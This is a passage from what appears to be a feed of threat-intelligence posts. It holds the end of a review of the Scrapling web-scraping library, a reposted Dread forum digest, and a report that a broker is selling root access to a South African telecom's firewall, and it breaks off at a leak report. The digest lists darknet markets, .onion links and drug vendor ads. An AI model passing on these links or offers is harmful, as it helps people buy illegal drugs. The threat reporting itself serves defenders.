bypass legality.** The StealthyFetcher's ability to bypass Cloudflare Turnstile and other anti-bot systems is technically impressive but operates in a legal gray area depending on jurisdiction and the target website's terms of service. The project includes appropriate disclaimers. ## // Bottom Line Scrapling's ambition is to be the one library you need for web scraping in Python. The breadth is impressive: from a two-line HTTP request to a full concurrent spider with pause/resume, stealth browser sessions, adaptive element tracking, and AI-assisted extraction via MCP. The parser performance matches the fastest Python options, and the adaptive element tracking is a genuine innovation that addresses one of scraping's biggest pain points — website changes breaking selectors. At 10.6k stars, 38 releases, and active development (latest release February 2026), it's well past the experimental stage. For teams already invested in Scrapy who just need parsing, it might be overkill. But for new projects that want a single framework covering the full scraping pipeline — from anti-bot bypass to concurrent crawling to AI integration — Scrapling is a strong option worth evaluating. [ GitHub Repository](https://github.com/D4Vinci/Scrapling) [ Documentation](https://scrapling.readthedocs.io/en/latest/) This library is provided for educational and research purposes. Users are responsible for complying with applicable data scraping and privacy laws. Always respect website terms of service and robots.txt. ### The Weekly Whiskey - 02/23/2026 URL: https://darkwebinformer.com/the-weekly-whiskey-02-23-2026/ Last updated: 2026-02-23T18:20:02.000Z Full version can be found on Dread: https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/7f506526ecb01497fc26 Tor browser is required to access any .onion links. This is a 1:1 copy from Dread user /u/samwhiskey --- | 🦸 ✅ SUPERLIST MARKETS ✅ | | ------------------------ | | \- [/d/DarkMatterMarket](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/d/DarkMatterMarket) | \- [/d/DarkMatterMarket/wiki?id=0b1527ca](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/d/DarkMatterMarket/wiki?id=0b1527ca) | | ------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------- | | \- [/d/Drughub](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/d/Drughub) | \- [/d/DrugHub/wiki?id=45b4b777](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/d/DrugHub/wiki?id=45b4b777) | | \- [/d/TorZonMarket](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/d/TorZonMarket) | \- [/d/TorZonMarket/wiki?id=bb45a6f9](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/d/TorZonMarket/wiki?id=bb45a6f9) | | \- [/d/BlackOps](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/d/BlackOps) | \- [/d/BlackOps/wiki?id=f3947ea5](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/d/BlackOps/wiki?id=f3947ea5) | | ❤️ WHAT'S HAPPENING ON DREAD? ❤️ | | | | | | | | | | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------- | ----------- | ------------------- | ------------------------ | ----------------------- | ------------------------ | ------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------- | | PA concerning [/u/BeeFreeLSD](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/u/BeeFreeLSD) [/post/2a8f81fbc947c7b81438](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/2a8f81fbc947c7b81438) | | | | | | | | | | Open invitation to LE lurkers - lets talk like adults [/post/faad3f4e7bbed27a78cc](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/faad3f4e7bbed27a78cc) | | | | | | | | | | AU OPSEC PA [/post/00fb4fc20ef6e981529a](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/00fb4fc20ef6e981529a) | | | | | | | | | | Welcome to [/d/food](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/d/food) [/post/eedf03ad1585c453e718](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/eedf03ad1585c453e718) | | | | | | | | | | "Good things never last forever" What's the best alternative to dread? [/post/4627946cdaa13cb6d86e](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/4627946cdaa13cb6d86e) | | | | | | | | | | Learn humility, and redeem youself - Even if your a bad person in life, you can still change to become a better person and redeem yourself [/post/efb9d20bd948ec6026ca](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/efb9d20bd948ec6026ca) | | | | | | | | | | Phantom Cuts 2 of 2 Cut List and Bibliography [/post/6f0d25b1d9c922bbafd9](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/6f0d25b1d9c922bbafd9) | | | | | | | | | | 150mcg - Just another trip report from a first time LSD user [/post/5713977190bb12f6cb9e](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/5713977190bb12f6cb9e) | | | | | | | | | | Unique Captcha Feedback? [/post/02f7682a95550cf0b468](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/02f7682a95550cf0b468) | | | | | | | | | | The Separation of Cocaine and Phenyltetrahydroimidazothiazole Mixtures [/post/ebe13fdc4275c306f6e0](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/ebe13fdc4275c306f6e0) | | | | | | | | | | \[CONTEST: $1250\] Archetyp sticker [/post/f1939e2c49e1424bd0ec](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/f1939e2c49e1424bd0ec) | | | | | | | | | | Autism and LSD [/post/4126bc6efcf333c739b4](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/4126bc6efcf333c739b4) | | | | | | | | | | (Revised) Drug PSA: Why Spice/Synthetics are not worth it [/post/a774026c0dc08f2997ad](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/a774026c0dc08f2997ad) | | | | | | | | | | My Journey (From FIAT to XMR) - AN EYE OPENING INCIDENT FOR MY FAMILY [/post/9152be4411ef6c8f90b6](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/9152be4411ef6c8f90b6) | | | | | | | | | | Let’s get some love showing. [/post/b8576972f60bd1568f58](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/b8576972f60bd1568f58) | | | | | | | | | | PSA: STOP USING AUSPOST BUSINESS ACCOUNTS [/post/f418d23db2394c7cb26d](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/f418d23db2394c7cb26d) | | | | | | | | | | The Layers you Forgot [/post/802414e52d956287e2f3](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/802414e52d956287e2f3) | | | | | | | | | | Ghost Mode PGP/GPG Privacy and Staying Anonymous! [/post/595ccc2e159609fc7efe](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/595ccc2e159609fc7efe) | | | | | | | | | | Why more men should be on Viagra... and it’s nothing to do with sex [/post/1b95069b85bae574b638](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/1b95069b85bae574b638) | | | | | | | | | | Phantom Cuts 1 of 2 Background [/post/d81962fcdd68ebb3f0bd](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/d81962fcdd68ebb3f0bd) | | | | | | | | | | If you edit your topic then automod will hide it from subdread moderators [/post/fa78b3b6e957b24025eb](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/fa78b3b6e957b24025eb) | | | | | | | | | | FAQ changes. Some wording, and a new question [/post/618bd706dffd1704da8e](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/618bd706dffd1704da8e) | | | | | | | | | | Devs have started to plan audits of the integration of FCMP++ [/post/8ebd227c1dbdd8e13703](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/8ebd227c1dbdd8e13703) | | | | | | | | | | ☕ CASUAL CONVOS ☕ | | | | | | | | | | MB4 is taking an extended leave from Dread. LOVE YOU ALL! [/post/24fad0437d45af6dc1f3](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/24fad0437d45af6dc1f3) | | | | | | | | | | Ding Dong - Time to retire. [/post/9bb3c6fde6b603322654](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/9bb3c6fde6b603322654) | | | | | | | | | | Give to others. [/post/59375f91cfe129732796](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/59375f91cfe129732796) | | | | | | | | | | Retirement #2\. [/post/9818254b3e21db61c973](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/9818254b3e21db61c973) | | | | | | | | | | An FBI ‘Asset’ Helped Run a Dark Web Site That Sold Fentanyl-Laced Drugs for Years- WIRED [/post/67219bc5030ffacaad06](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/67219bc5030ffacaad06) | | | | | | | | | | Because Science Bitches [/post/e64b307b190335ab13f0](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/e64b307b190335ab13f0) | | | | | | | | | | Do you have any experience with ghosts? Real talk please [/post/46261f6540472b5bc283](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/46261f6540472b5bc283) | | | | | | | | | | Client Side Scanning - A Dystopia On Our Doorstep [/post/b4f30efff6451d68ea38](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/b4f30efff6451d68ea38) | | | | | | | | | | How OpenAI, The US government, and persona built an identity surveillance machine that files reports on you to the feds [/post/3b731b772001322515e6](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/3b731b772001322515e6) | | | | | | | | | | Why hasn’t Dread ever been seized? [/post/6b7a00579594753deb9a](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/6b7a00579594753deb9a) | | | | | | | | | | /u/Phobos36 has cleaned house. [/post/89d5960726aaa2a8712a](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/89d5960726aaa2a8712a) | | | | | | | | | | 1 Year on Dread, and man its been something. [/post/92cbd0e82a711f8cdb63](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/92cbd0e82a711f8cdb63) | | | | | | | | | | If a market refuses to join dread, do you think that will affect it's growth? [/post/19919c3ee38cba005a23](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/19919c3ee38cba005a23) | | | | | | | | | | which north american country do you think has the most active drug users/buyers [/post/0ee419f307e8eb116ccf](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/0ee419f307e8eb116ccf) | | | | | | | | | | What are your opintion on "whales" regarding online games? [/post/7f7aa9a3f54fde474b39](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/7f7aa9a3f54fde474b39) | | | | | | | | | | what's your biggest regret in life [/post/bd164ab0ae7efc680268](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/bd164ab0ae7efc680268) | | | | | | | | | | New Chrome Zero-Day (CVE-2026-2441) CSS Bug Under Active Attack [/post/cac877d485edf5cb1821](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/cac877d485edf5cb1821) | | | | | | | | | | Do You believe we live in some kind of simulation? [/post/f0d74a8aa60d40da2e8d](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/f0d74a8aa60d40da2e8d) | | | | | | | | | | ⚡️ PRODUCT REVIEWS ⚡️ | | | | | | | | | | \[REVIEW\] 626Shroomz 1ml DMT Vape Pen [/post/1859d6fde117f4f47823](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/1859d6fde117f4f47823) | | | | | | | | | | 🏆 \[Review\] 🏆 QuickCokePlus - Lavada Cocaine [/post/af3fbd6403b0f681ebca](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/af3fbd6403b0f681ebca) | | | | | | | | | | RXworld 325mg soma review [/post/9cb88252abda8d448283](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/9cb88252abda8d448283) | | | | | | | | | | \[Review\] - PopeyesLine - 90ct FarmaPrams (2mg each) (Lot # 2508601 - Expiry July 2028) [/post/215c0c72fab88564741a](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/215c0c72fab88564741a) | | | | | | | | | | MisterClean. Pure KETAMIN Sugar [/post/131e37e988670d3eb36f](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/131e37e988670d3eb36f) | | | | | | | | | | \[Review\] epigram - 100 x BLUE TESLA XTC TABLETS @ 200mg PURE MDMA [/post/35fd8c3323ccfb8fc406](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/35fd8c3323ccfb8fc406) | | | | | | | | | | LIONSHOP REVIEW - IRAN and AFGHAN Heroins - I liked it !! [/post/688f7ca76414e9ed3561](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/688f7ca76414e9ed3561) | | | | | | | | | | 🕵️ OPSEC 🕵️ | | | | | | | | | | Paragon [/post/de5ae6c35532340b8ea0](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/de5ae6c35532340b8ea0) | | | | | | | | | | Cipher Phone OPSEC [/post/a4388b82b68f5a1d0e4f](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/a4388b82b68f5a1d0e4f) | | | | | | | | | | MULLVAD VPN Advice [/post/a62f4b62a3e958cbad5d](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/a62f4b62a3e958cbad5d) | | | | | | | | | | Facial Recognition is getting BAD [/post/59f8934f7f203779611e](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/59f8934f7f203779611e) | | | | | | | | | | WARNING: Whonix release upgrade breaks kloak, check your system [/post/1eb43ff84b45faa090cf](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/1eb43ff84b45faa090cf) | | | | | | | | | | You need to watch people around you this could save your life [/post/64562fd30bb72b8fc9dc](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/64562fd30bb72b8fc9dc) | | | | | | | | | | GrapheneOS Installation & Hardening Guide for Google Pixel [/post/7529197e9273aadba143](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/7529197e9273aadba143) | | | | | | | | | | Chat GPT [/post/9f6e0d0265e1cd458639](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/9f6e0d0265e1cd458639) | | | | | | | | | | Intel ME disabling for QubesOS [/post/9ae4dc103a153e058097](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/9ae4dc103a153e058097) | | | | | | | | | | How Important Is Having Your Own Node [/post/11a14de4f0a43e5c865a](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/11a14de4f0a43e5c865a) | | | | | | | | | | Libreboot X230 Qubes OPSEC [/post/a00d530276c02f2d0974](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/a00d530276c02f2d0974) | | | | | | | | | | Simple PGP Trick [/post/e70103a534074dbf0c69](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/e70103a534074dbf0c69) | | | | | | | | | | 👑 DREAD 👑 | | | | | | | | | | Happy 8th Birthday Dread! [/post/a08ff9954d3d6a84b0a2](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/a08ff9954d3d6a84b0a2) | | | | | | | | | | Dread Writing Competition - WIN $1,000 XMR [/post/e74e0d2fa9a165ec3b43](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/e74e0d2fa9a165ec3b43) | | | | | | | | | | Which Meme Will Reign Supreme?? [/post/560cf8b7417dbd54b00b](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/560cf8b7417dbd54b00b) | | | | | | | | | | May I ask what's the point of the "block" feature if you can still see and respond to each others' comments? [/post/0b6d99de95cb9b5cb62f](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/0b6d99de95cb9b5cb62f) | | | | | | | | | | uh where does dread get its captchas? [/post/1f8d86efc67c5a7606f1](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/1f8d86efc67c5a7606f1) | | | | | | | | | | Account identification past deletion [/post/17471df440cea90e29ed](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/17471df440cea90e29ed) | | | | | | | | | | Ok True Dreaders, truth time! [/post/b365686790cd06ac3031](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/b365686790cd06ac3031) | | | | | | | | | | How to fully disable JavaScript in Dread [/post/ab4cf2e40c75b0a71e8e](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/ab4cf2e40c75b0a71e8e) | | | | | | | | | | Dread Group Chats [/post/d891e76093c78157d083](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/d891e76093c78157d083) | | | | | | | | | | 🍼 BEST OF THE BABIES 🍼 | | | | | | | | | | Baby has no luck. Gets no respect [/post/9581dd758c99ce6d1d0c](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/9581dd758c99ce6d1d0c) | | | | | | | | | | Baby gets mad [/post/8a4f684be871ffe1bea8](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/8a4f684be871ffe1bea8) | | | | | | | | | | Dealers vs buyers [/post/a86b232b09e50b772d27](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/a86b232b09e50b772d27) | | | | | | | | | | What drug feels like love [/post/0cc36f1cbf545e86f41f](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/0cc36f1cbf545e86f41f) | | | | | | | | | | 💎 MARKET VENDOR ADS 💎 | | | | | | | | | | \- [/u/GermanysFinest](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/u/GermanysFinest)GER - EU \| La Mousse 2,7 | Lightly Ovecured Drysift 3,4 | Drysift 4,2 | Premium Drysift 4,5 | Frozensift by Chubby 7,4 | Frozensift by Hasbi 9,6 | Canada Cali Topshelf 5,5 | Acetone Washed Coke 23,5 | Menu with Pictures [/post/43a8e0a2b098f0ca7049](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/43a8e0a2b098f0ca7049) | | \- [/u/FunnyBones](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/u/FunnyBones) highest quality psychedelics. | | | | | | | | | | \- [/u/YourPharm](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/u/YourPharm) Pharmaceutical Adderall 20mg (TEVA Brand) and Vyvanse 70mg (Shire) - LIMITED STOCK \[US-US\] [/post/e25da5efd933886a5d18](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/e25da5efd933886a5d18) | | | | | | | | | | \- [/u/AureliaShop](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/u/AureliaShop) Premium S-Isomer (97% Pure) + 750 EUR Ketamine Lottery at Aurelia [/post/ef8a6ebbf063784f419b](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/ef8a6ebbf063784f419b) | | | | | | | | | | \- [/u/pilltastic](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/u/pilltastic) Dutch Quality For Honest Prices [/post/7fe5c0ef94482ae6b6b3](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/7fe5c0ef94482ae6b6b3) | | | | | | | | | | \- [/u/kmart](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/u/kmart) Highest Quality Ketamine \[S-isomer\] (97% SUPERIOR LABGRADE) \[$400 per ounce\] USA to USA [/post/6cec34287403164a23cd](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/6cec34287403164a23cd) | | | | | | | | | | \- [/u/TheHighTable](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/u/TheHighTable) \- The Best Cannabis Delivery Service In The Universe [/post/9cfad5a33b312dc05afc](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/9cfad5a33b312dc05afc) | | | | | | | | | | \- [/u/Spritetyson](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/u/Spritetyson) !!!Real Oxys, Adderall, Xanax and AAA+ Cocaine Same day shipping USA to USA!!! [/post/6521652d0cb63ee6292a](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/6521652d0cb63ee6292a) | | | | | | | | | | \- [/u/auschemistwarehouse](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/u/auschemistwarehouse) active on Drughub and Blackops aus2aus for all your pharma fueled desires! [/post/1769dfd91dd2b8b35786](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/1769dfd91dd2b8b35786) | | | | | | | | | | 📖 GUIDES 📚 | | | | | | | | | | Opsec Guides [/d/OpSec/wiki?id=ea7f4385](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/d/OpSec/wiki?id=ea7f4385) | | | | | | | | | | Harm Reduction - Drug Combinations [/d/HarmReduction/wiki?id=5f9defb7](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/d/HarmReduction/wiki?id=5f9defb7) | | | | | | | | | | Harm Reduction - Reagent Testing [/d/HarmReduction/wiki?id=5af25a46](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/d/HarmReduction/wiki?id=5af25a46) | | | | | | | | | | Image Posting Guide [/d/coke/wiki/?id=92d6d21d](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/d/coke/wiki/?id=92d6d21d) | | | | | | | | | | Getting Started with Hacking [/d/hacking/wiki?id=543e1426](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/d/hacking/wiki?id=543e1426) | | | | | | | | | | The best of [/d/pgp](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/d/pgp) 🔐 Guides, articles & quality posts [/post/536223499f033f4a873a](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/536223499f033f4a873a) | | | | | | | | | | | 💩 Quality Shitposts 🧻 | | | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | \- [/post/f54e1cfef54f65b571d1](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/f54e1cfef54f65b571d1) \- [/post/8bf128c533547ea5704a](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/8bf128c533547ea5704a) \- [/post/1db24fdc8d8d5998285d](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/1db24fdc8d8d5998285d) \- [/post/009b38de27eeb822a9f6](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/009b38de27eeb822a9f6) \- [/post/1a3f837f2c7ff4b12140](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/1a3f837f2c7ff4b12140) | \- [/post/642bf6b487eb376927aa](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/642bf6b487eb376927aa) \- [/post/4b8e0a3d3883a21cdb8a](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/4b8e0a3d3883a21cdb8a) \- [/post/957e2108028a52cc4f22](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/957e2108028a52cc4f22) \- [/post/5b5732ea30d75272bd4a](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/5b5732ea30d75272bd4a) \- [/post/d10e426e1d06cfe6aee2](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/d10e426e1d06cfe6aee2) | \- [/post/94e90e1b64f6d1446ad9](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/94e90e1b64f6d1446ad9) \- [/post/6d5446fc2126fc7d3fb8](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/6d5446fc2126fc7d3fb8) \- [/post/12caaf84fc86cd3a7ca3](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/12caaf84fc86cd3a7ca3) \- [/post/eaaf575e5fd6f2127f47](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/eaaf575e5fd6f2127f47) \- [/post/9481e8a26e9fffba94d8](https://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/post/9481e8a26e9fffba94d8) | ### Root Access and Firewall Control to a Leading South African Telecom Offered for $300 URL: https://darkwebinformer.com/root-access-and-firewall-control-to-a-leading-south-african-telecom-offered-for-300/ Last updated: 2026-02-23T21:05:24.000Z Dark Web Informer - Cyber Threat Intelligence # Root Access and Firewall Control to a Leading South African Telecom Offered for $300 February 23, 2026 - 1:26:43 PM UTC ![South Africa](https://flagcdn.com/20x15/za.png)South Africa Telecommunications Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-02-23 13:26:43 UTC Threat Actor miyako Victim Country ![South Africa](https://flagcdn.com/20x15/za.png)South Africa Industry Telecommunications Victim Organization Unknown Victim Site Unknown Category Initial Access Severity High Network Open Web Price $300 (Fixed) ## Incident Overview An initial access broker operating under the handle miyako is selling unauthorized access to what they describe as a leading South African telecommunications company. The listing specifies a Linux-based firewall device with root RCE, shell access, and network admin panel permissions. Revenue is listed as unknown. The fixed price is $300 with no negotiation, and the seller states serious buyers only with contact via Session. ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing root access and firewall control sale for South African telecom](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/87388185344095445953-1.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/02/87388185344095445953-1.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### 8,861 Email Agents from France's Department of Interior and Department of Defense Leaked URL: https://darkwebinformer.com/8-861-email-agents-from-frances-department-of-interior-and-department-of-defense-leaked/ Last updated: 2026-02-20T18:07:57.000Z Dark Web Informer - Cyber Threat Intelligence # 8,861 Email Agents from France's Department of Interior and Department of Defense Leaked February 